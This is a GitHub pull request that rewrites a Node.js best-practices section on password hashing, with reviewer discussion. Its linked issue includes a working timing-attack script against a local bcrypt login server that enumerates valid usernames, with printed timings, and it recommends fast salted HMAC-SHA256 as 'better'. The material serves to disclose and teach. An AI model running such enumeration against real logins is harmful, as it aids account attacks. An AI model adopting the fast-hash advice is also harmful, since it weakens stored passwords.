### PR TITLE
Update and rename bcryptpasswords.md to passwordhashing.md

### LINKED ISSUE #325: 6.8 Feasibility of time-based database brute-force attacks on websites
In the [recomendation](https://github.com/i0natan/nodebestpractices#-68-avoid-using-the-nodejs-crypto-library-for-handling-passwords-usebcrypt) 

> Avoid using the Node.js crypto library for handling passwords, use Bcrypt

Here is not mentioned the possibility of a timing attack if not handled properly bcrypt.

For example:
### server.js
```javascript
const express = require('express');
const bodyParser = require('body-parser');
const sql = require("sqlite3").verbose();
const bcrypt = require('bcrypt');

const initConn = (sqlite3) => {
    const conn = new sqlite3.Database('db/users.db', (err) => {
        if (err) {
            console.log('Could not connect to database', err)
        } else {
            console.log('Connected to database')
        }
    });
    return conn;
}

const initTable = (conn) => {
    conn.serialize(function () {
        conn.run("CREATE TABLE IF NOT EXISTS users (login TEXT NOT NULL UNIQUE, password TEXT NOT NULL)");
    });
}

const deleteUser = (db, login) => {
    db.serialize(() => {
        db.run(`DELETE FROM users WHERE login = $login;`, {
            $login: login
        })
    })
}

const createUser = (db, login, password) => {
    db.serialize(() => {
        db.run(`INSERT INTO users (login, password) VALUES ($login, $password);`, {
            $login: login,
            $password: password
        })
    })
}

const conn = initConn(sql);
initTable(conn);

// asynchronously generate a secure password using 10 hashing rounds
bcrypt.hash("whatthefoxsay", 10, function (err, hash) {
    // Store secure hash in user record
    deleteUser(conn, 'v7')
    createUser(conn, 'v7', hash)
});

const app = express();
app.use(bodyParser.json());

app.post('/api/v1/login', (req, res) => {
    conn.all(`
        SELECT rowid AS id, login, password
           FROM users
            WHERE login = $login
        `, {
            $login: req.body.login
        },
        function (err, rows) {
            if (err) {
                res.send(err.message);
            } else {
                let loginFlag = false
                if (rows && rows.length > 0) {
                    // compare a provided password input with saved hash
                    bcrypt.compare(req.body.password, rows[0].password, function (err, match) {
                        res.send(match ? 'logged in' : 'bad news');
                    });
                } else {
                    res.send(loginFlag ? 'logged in' : 'bad news');
                }
            }
        })
})

app.listen(3030, () => {
    console.log('start');
})
```

### attacker.js
```javascript
const request = require('request');

const sendRequest = function (login, password) {
    const result = {
        login,
        password
    }
    const promise = new Promise(function (res, rej) {
        result.start = Date.now(),
            request.post(
                'http://127.0.0.1:3030/api/v1/login',
                { json: { login, password } },
                function (error, response, body) {
                    if (!error && response.statusCode == 200) {
                        result.end = Date.now();
                        res(result);
                    }
                }
            );
    })
    return promise;
}

function makePassword(length) {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  
    for (var i = 0; i < length; i++)
      text += possible.charAt(Math.floor(Math.random() * possible.length));
  
    return text;
  }

const run = async () => {
    const responseArray = []
    for (let i = 0; i < 20; i++) {
        const res = await sendRequest((i % 2 === 0) ? "v7" : "v7_wrong", makePassword(8))
        responseArray.push(res);
    }
    return responseArray
}

run().then((responseArray) => {
    responseArray.map((response) => {
        console.log(response.login, response.end - response.start)
    })
})
```

If we run the server.js and the attacker.js, we'll get:
```
$ node ./attacker.js 
v7 89
v7_wrong 3
v7 74
v7_wrong 2
v7 74
v7_wrong 2
v7 75
v7_wrong 2
v7 75
v7_wrong 1
v7 75
v7_wrong 2
v7 74
v7_wrong 1
v7 75
v7_wrong 2
v7 75
v7_wrong 2
v7 76
v7_wrong 2
```

That allows us to brute force to know the logins that are in the database.

Crypto module behaves much better in this case.

If we change server like this:

### server_with_crypto.js
```javascript
const express = require('express');
const bodyParser = require('body-parser');
const sql = require("sqlite3").verbose();
const bcrypt = require('bcrypt');

const initConn = (sqlite3) => {
    const conn = new sqlite3.Database('db/users.db', (err) => {
        if (err) {
            console.log('Could not connect to database', err)
        } else {
            console.log('Connected to database')
        }
    });
    return conn;
}

const initTable = (conn) => {
    conn.serialize(function () {
        conn.run("CREATE TABLE IF NOT EXISTS users (login TEXT NOT NULL UNIQUE, password TEXT NOT NULL)");
    });
}

const deleteUser = (db, login) => {
    db.serialize(() => {
        db.run(`DELETE FROM users WHERE login = $login;`, {
            $login: login
        })
    })
}

const createUser = (db, login, password) => {
    db.serialize(() => {
        db.run(`INSERT INTO users (login, password) VALUES ($login, $password);`, {
            $login: login,
            $password: password
        })
    })
}

const conn = initConn(sql);
initTable(conn);

const crypto = require('crypto');
const getFuncSHA256Salt = (salt) => {
    return (password) => {
        var hash = crypto.createHmac('sha256', salt);
        hash.update(password);
        var value = hash.digest('hex');
        return value;
    }
};
const cryptoSHA256Salt = getFuncSHA256Salt("HVHSNrRWpP1ZSR4bnjXpiHCS1ENYcUuHO")

deleteUser(conn, 'v7')
createUser(conn, 'v7', cryptoSHA256Salt("whatthefoxsay"))

const app = express();
app.use(bodyParser.json());

app.post('/api/v1/login', (req, res) => {
    conn.all(`
        SELECT rowid AS id, login, password
           FROM users
            WHERE login = $login
        `, {
            $login: req.body.login
        },
        function (err, rows) {
            if (err) {
                res.send(err.message);
            } else {
                let loginFlag = false
                if (rows && rows.length > 0) {
                    res.send( (cryptoSHA256Salt(req.body.password) === rows[0].password) ? 'logged in' : 'bad news' )
                } else {
                    res.send(loginFlag ? 'logged in' : 'bad news');
                }
            }
        })
})

app.listen(3030, () => {
    console.log('start');
})
```

We'll get:
```
$ node ./attacker.js 
v7 16
v7_wrong 3
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 2
v7_wrong 2
v7 1
v7_wrong 1
v7 2
v7_wrong 2
v7 2
v7_wrong 1
v7 2
v7_wrong 2
v7 1
v7_wrong 1
```

# summary:
I believe it is important to mention this point and bring good practice of using bcrypt in authentication, since it is cited as the best alternative to crypto

### PR DESCRIPTION
**Pull request by josh-hemphill**
closes #325
Presenting the tradeoffs between the [IETF's](https://tools.ietf.org/id/draft-whited-kitten-password-storage-00.html#name-kdf-recommendations) and [OWASP's](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Password_Storage_Cheat_Sheet.md#modern-algorithms) top recommendations, as well as adding mention of making your implementation unique to make your hash different from other's if given the same password.
Mentioned to use [IETF's default parameters](https://tools.ietf.org/id/draft-whited-kitten-password-storage-00.html#name-kdf-recommendations) for the functions.

I thought about saying more about Salt generation, but it was already getting a bit verbose. So any suggestions would be helpful.

I should also mention, the linked issue's original point doesn't apply to the actual `bcrypt` npm module (removed suggesting "other" bcrypt modules), but the discussion deviated into more generally providing the situationality of the top recommended algorithms.

### CODE REVIEW

**Comment by js-kyle** [comment]
This looks great! Someone or myself will be able to review it when we can 👍

File: sections/security/passwordhashing.md [hunk 1]
```diff
@@ -0,0 +1,82 @@
...
+
+The external dependency, `bcrypt` is the most widely supported and should be used when possible, as when using `bcrypt`, a number of 'rounds' can be specified in order to provide a secure hash. This sets the work factor or the number of 'rounds' the data is processed for, and more hashing rounds leads to more secure hash (although this at the cost of CPU time). The introduction of hashing rounds means that the brute force factor is significantly reduced, as password crackers are slowed down increasing the time required to generate one attempt.
+
+The `scrypt` function included in the native crypto module can be used as it is a slight improvement over `bcrypt`, allowing for unlimited length passwords, and does not add a dependency, though it needs more configuration and is newer and thus less scrutinized. `scrypt` uses cost (to increase CPU/memory cost), blockSize (to increase memory cost), and parallelization (to increase the cost of breaking it up into separate operations) together to define how secure it is, how long it will take, and what it's most secure against.
```
Comment (js-kyle) [inline sections/security/passwordhashing.md:11]: Minor - could be nice to link to the node documentation here

File: sections/security/passwordhashing.md [hunk 2]
```diff
@@ -0,0 +1,82 @@
...
+} catch {
+  logger.error('could not hash password.')
+}
+```
+
+### Code example - SCrypt
+
+```javascript
+  const outSize = 64;
+  const hash = scryptSync('myUnlimitedPassword','someUniqueUserValueForSalt',outSize).toString('hex');
```
Comment (js-kyle) [inline sections/security/passwordhashing.md:42]:
```suggestion
  const hash = crypto.scryptSync('myUnlimitedPassword','someUniqueUserValueForSalt',outSize).toString('hex');

```

File: sections/security/passwordhashing.md [hunk 3]
```diff
@@ -0,0 +1,82 @@
...
+  // Store secure hash in user record
+
+  // compare a provided password input with saved hash
+  const match = hash === scryptSync('someUnlimitedPassword','derivedSalt',outSize).toString('hex');
```
Comment (js-kyle) [inline sections/security/passwordhashing.md:46]:
```suggestion
  const match = hash === crypto.scryptSync('someUnlimitedPassword','derivedSalt',outSize).toString('hex');

```

File: sections/security/passwordhashing.md [hunk 4]
```diff
@@ -0,0 +1,82 @@
...
+```
+
+### Code example - PBKDF2 (Password-Based Cryptography Specification Version 2.1)
+
+```javascript
+try {
+  const outSize = 64;
+  const digest = 'blake2b512';
+  const iterations = 12;
+  const hash = pbkdf2Sync('myPassword','someUniqueUserValueForSalt', iterations * 1000, digest, outSize).toString('hex');
```
Comment (js-kyle) [inline sections/security/passwordhashing.md:61]:
```suggestion
  const hash = crypto.pbkdf2Sync('myPassword','someUniqueUserValueForSalt', iterations * 1000, digest, outSize).toString('hex');

```

File: sections/security/passwordhashing.md [hunk 5]
```diff
@@ -0,0 +1,82 @@
...
+  // Store secure hash in user record
+
+  // compare a provided password input with saved hash
+  const match = hash === pbkdf2Sync('somePassword','derivedSalt', iterations * 1000, digest, outSize).toString('hex');
```
Comment (js-kyle) [inline sections/security/passwordhashing.md:65]:
```suggestion
  const match = hash === crypto.pbkdf2Sync('somePassword','derivedSalt', iterations * 1000, digest, outSize).toString('hex');

```

**Review by js-kyle — APPROVED** [review]

**Comment by js-kyle** [comment]
This looks good to me. If you have some time @lirantal could you take a second look, since you were across some of the earlier discussion for this practice?

File: sections/security/passwordhashing.md (hunk 1 above)
Comment (josh-hemphill) [reply sections/security/passwordhashing.md]: Do you mean link to the API docs? Or does node have some recommendations or explanations in the docs somewhere I should add a link to?
I went ahead and added links to the three functions/library. ad0e74fac372802508ad046e67c29e45b49320aa

Comment (js-kyle) [reply sections/security/passwordhashing.md]: Looking good

**Review by goldbergyoni — CHANGES_REQUESTED** [review]
@josh-hemphill Welcome aboard, this is truly an amazing drill-down💜

@js-kyle @josh-hemphill One fundamental suggestion - The new version not only makes this much more exhaustive and advanced but also might make it harder for the average developer to extract actionable items. I would choose the 2-3 core messages **including the action item** (e.g. use Bcrypt or Script, whatever you think). This shouldn't be longer than 2 paragraphs, we call it "One paragraph" but we're developers and start counting from zero :) Anyway, it should be shorter and simpler than what we have now.

Then all the great advanced content and elaboration should come at the bottom under a title **'Advanced and references'**. 

Resonates with you?

File: README.md [hunk 6]
```diff
@@ -832,15 +832,15 @@ All statements above will return false if used with `===`
 
 <br/><br/>
 
-## ![✔] 6.8. Avoid using the Node.js crypto library for handling passwords, use Bcrypt
+## ![✔] 6.8. Protect Users' Passwords/Secrets
```
Comment (lirantal) [inline README.md:835]: This part looks good to me

File: sections/security/userpasswords.md [hunk 7]
```diff
@@ -0,0 +1,115 @@
+# Secure Your Users' Passwords
+
+### One Paragraph Explainer
+
+**Always** encrypt users' passwords as opposed to storing them as text; there are three options that depend on your use case for encrypting user passwords. All the below functions need to be implemented properly to provide any security. (Reference the miminums or see the [IETF's recommendations](https://tools.ietf.org/id/draft-whited-kitten-password-storage-00.html#name-kdf-recommendations) for what parameters to use for each) You should use the recommended properties as a minimum, using higher parameters and a combination that's unique to your program can help mitigate some of the damage if someone ever runs off with your password hashes. Also, always add a [salt](https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/) (reproducable data, unique to the user and your system) to your passwords before you hash.
```
Comment (lirantal) [inline sections/security/userpasswords.md:5]: I think you meant to say hashing here?
Generally speaking, all 3 options: encrypting, hashing, and plain-text are valid to say but encryption !== hashing.

**Comment by lirantal** [comment]
FYI @js-kyle @goldbergyoni added some comments above

File: sections/security/userpasswords.md (hunk 7 above)
Comment (josh-hemphill) [reply sections/security/userpasswords.md:5]: Lol, yep. I even added a link to the differences between hashing and encryption in the references, but then went said it wrong right at the top.

Comment (lirantal) [reply sections/security/userpasswords.md]: No worries, all good :-)

**Review by js-kyle — DISMISSED** [review]

File: README.md (hunk 6 above)
Comment (goldbergyoni) [reply README.md:835]: @josh-hemphill Consider This sounds a bit vanilla, 'of course I should protect users password, but explain how'. Consider including the punch: 'Protect Users' Passwords/Secrets using BCrypt or Script'.

**Review by goldbergyoni — DISMISSED** [review]
@josh-hemphill Looks more than perfect to me, amazing work 💜. I believe that this will help 80% of the developers to avoid fatal mistakes and allow the 20% to understand much better and make thoughtful decisions. Consider changing the title, make it more tangible and punchy, see my comment.

This will get merged in 24 hours. Obviously adding you now to the contributor's board, Tweeting about it and putting in the news. What's your Twitter handle?

@js-kyle Great coordination and review

@lirantal You're the king

**Review by goldbergyoni — APPROVED** [review]
LGTM

**Comment by goldbergyoni** [comment]
@all-contributors please add @josh-hemphill for content

**Pull request merged**